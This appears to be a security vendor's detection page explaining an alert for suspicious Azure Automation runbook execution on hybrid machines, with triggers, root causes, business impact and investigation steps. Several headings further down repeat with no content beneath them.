Azure Suspicious Hybrid Automation Execution

Azure Suspicious Hybrid Automation Execution

Detection overview

Triggers

  • Unusual execution of an Azure Automation Runbook on a hybrid machine by an unexpected or unauthorized user/service principal.
  • Unusual changes to Runbook execution permissions.
  • Runbooks are being executed (deployed) on hybrid machines for legitimate business use-cases.

Possible Root Causes

  • A compromised principal account is attempting to execute malicious Runbooks.
  • An administrator or developer has inadvertently created or modified a Runbook with unusual logic.
  • Automated deployment scripts are updating Runbooks without proper authorization.
  • A legitimate business process involves running Runbooks, but the execution frequency or parameters have been altered.

Business Impact

  • Exposure of sensitive data due to unauthorized access or data leaks.
  • Security vulnerabilities exploited through misconfigured VMs or runbooks or hybrid enviroments.
  • Disruption of critical business services and reputational damage due to unplanned system downtime.
  • Unauthorized changes to business logic or workflows, leading to financial losses or compliance issues.

Steps to Verify

  • Review Azure Activity Logs for the suspicious event, focusing on the user/service principal and the executed hybrid Runbook.
  • Investigate the user’s or service principal’s permissions and access levels within Azure.
  • Verify if other security alerts or notifications were triggered around the time of the suspicious event.
  • Inspect the Runbook code for signs of malicious activity. To view the Runbook:
    - Navigate to the 'Automation Accounts' service in Azure
    - Identity the Automation Account associated to the Runbook
    - The Runbooks can be found under the 'Process Automation' tab for the selected Automation Account
  • Consult with Azure administrators, security teams, and relevant stakeholders to determine the cause and scope of the incident.
  • If review indicates malicious actions, isolate the hybrid machine group for further investigation or member workers and remediate.
Azure Suspicious Hybrid Automation Execution

Possible root causes

Malicious Detection

Benign Detection

Azure Suspicious Hybrid Automation Execution

Example scenarios

Azure Suspicious Hybrid Automation Execution

Business impact

If this detection indicates a genuine threat, the organization faces significant risks:

Azure Suspicious Hybrid Automation Execution

Steps to investigate

Azure Suspicious Hybrid Automation Execution

MITRE ATT&CK techniques covered

Azure Suspicious Hybrid Automation Execution

Related detections

No items found.

FAQs